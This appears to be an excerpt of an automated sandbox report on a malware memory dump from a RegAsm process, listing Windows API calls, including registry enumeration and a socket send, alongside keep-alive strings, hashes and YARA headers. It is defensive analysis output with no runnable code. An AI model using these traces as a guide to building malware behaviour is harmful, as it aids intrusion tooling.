                                  • Instruction ID: 0dc8c32c25bbfe63b0c08367986f7c886cc6088a9617a128ed0d147125553272
                                  • Opcode Fuzzy Hash: 4b91a563d960731c995c8f312f2b7ca282ace2253d8e8cdccd3d1816b9aa4853
                                  • Instruction Fuzzy Hash: FA519A61A0460186E7117718CD823BB3BA0EB46741F20596FF5C6863A9EB3DCCD19A8F
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID: 01B
                                  • API String ID: 2931989736-2242190220
                                  • Opcode ID: e631a8cb302e0db55f470f521299e41934546e7d6a45f37c751ecbb6d8a4233c
                                  • Instruction ID: b681089afacfdc10096d0b0687866a9e2916795602fd0264882fd2f37da336bc
                                  • Opcode Fuzzy Hash: e631a8cb302e0db55f470f521299e41934546e7d6a45f37c751ecbb6d8a4233c
                                  • Instruction Fuzzy Hash: F151B531B00626ABCB21CF6AEA80A6BF7B5FF54310F95812ADD5897320D735ED11CB84
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 0040D763
                                    • Part of subcall function 0040D476: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040D4DD
                                    • Part of subcall function 0040D476: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 0040D50C
                                    • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                  • RegCloseKey.ADVAPI32(?,00459594,00459594,0045962C,0045962C), ref: 0040D8B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumInfoOpenQuerysend
                                  • String ID: X|F
                                  • API String ID: 3114080316-2178643013
                                  • Opcode ID: 8657c457f44454869b7a86774b43540244445b8884b6d32a4f7182bec9a3751e
                                  • Instruction ID: 52a15b34a4ac20fa923b067356e63d5415b277d9ab81aa83f9cc7be8be0fef2c
                                  • Opcode Fuzzy Hash: 8657c457f44454869b7a86774b43540244445b8884b6d32a4f7182bec9a3751e
                                  • Instruction Fuzzy Hash: 5641AD71A002185ACB04F775DCA6AEE77649B91308F40817FF60A772D2EF781E89C65E
                                  APIs
                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00443FA3,?,00000050,?,?,?,?,?), ref: 00443E23
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ACP$OCP
                                  • API String ID: 0-711371036
                                  • Opcode ID: a6acee0346e3f6ae40b400c22f75c3be6bc2a9de64828de0f4f71846a915cbd2
                                  • Instruction ID: d655ddf23005c5a9f15a52119ce0e88508a13c35cbcc5d652d1131ff6491d290
                                  • Opcode Fuzzy Hash: a6acee0346e3f6ae40b400c22f75c3be6bc2a9de64828de0f4f71846a915cbd2
                                  • Instruction Fuzzy Hash: 3421C1A2E00101A6FB248E64D901B9B72A6EF54F57F668427F90AD7304E73ADF01C398
                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00401E49
                                    • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                  • GetLocalTime.KERNEL32(?), ref: 00401EA1
                                  Strings
                                  • KeepAlive | Enabled | Timeout: , xrefs: 00401E3E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID: KeepAlive | Enabled | Timeout:
                                  • API String ID: 481472006-1507639952
                                  • Opcode ID: d2551ff06c508966204778e269e6d5628556bda4d2d3490b73be2430c0923865
                                  • Instruction ID: 1d52dbcb1ff0e0c2d988e19544ba4eb29f5678dad8abbd2e12691aec51a988aa
                                  • Opcode Fuzzy Hash: d2551ff06c508966204778e269e6d5628556bda4d2d3490b73be2430c0923865
                                  • Instruction Fuzzy Hash: 9D21D171E0424067CB10B7BAED0A7EEBB245793345F14413EEC01272E2EEB85949C7AB
                                  APIs
                                  • GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID: | $%02i:%02i:%02i:%03i
                                  • API String ID: 481472006-2430845779
                                  • Opcode ID: 401af5ccc1cab520af356f105505c2aad688da410eea88cdee17d0666efcdc99
                                  • Instruction ID: c71449d0853176ac06c3336b483bb21f3570e9d7b28fb8d8682e76423a61a460
                                  • Opcode Fuzzy Hash: 401af5ccc1cab520af356f105505c2aad688da410eea88cdee17d0666efcdc99
                                  • Instruction Fuzzy Hash: C91151725183055BC304FB75D8558ABB3E8AB94709F50093FFA8A920D1FF7CDA88C65A
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004349A0
                                  • GetLastError.KERNEL32(?,?), ref: 004349AE
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?), ref: 00434A09
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  • Opcode ID: 22b6cbf06836f6600c0e7c3de66aaecea1dd54ab08b00387fa4f3e6206e4a88e
                                  • Instruction ID: cc1d80011ffea3f1df985999827adad67b7e2f370d91c135a993c9fa55757793
                                  • Opcode Fuzzy Hash: 22b6cbf06836f6600c0e7c3de66aaecea1dd54ab08b00387fa4f3e6206e4a88e
                                  • Instruction Fuzzy Hash: FE410935A00201AFDF219F65C844BFBBBA4EFCA310F1451AAF859572A1D738AD01C75C
                                  APIs
                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 0040C9EE
                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 0040CAC3
                                  • SetLastError.KERNEL32(0000007F), ref: 0040CADE
                                  • SetLastError.KERNEL32(0000007E,?,0040CD60), ref: 0040CAF7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastRead
                                  • String ID:
                                  • API String ID: 4100373531-0
                                  • Opcode ID: db9137be8a35981e6591980c942ba5589716ffca3f2a32cd0978180f6a0b4dbf
                                  • Instruction ID: 499532b790c8abcea526b823558a84bddce30115e00368c610d72d2e208af3f3
                                  • Opcode Fuzzy Hash: db9137be8a35981e6591980c942ba5589716ffca3f2a32cd0978180f6a0b4dbf
                                  • Instruction Fuzzy Hash: AD416671B00209DFDB24CF99D884B6AB7F5EF48310F10856AE506A7291EB78E801CF54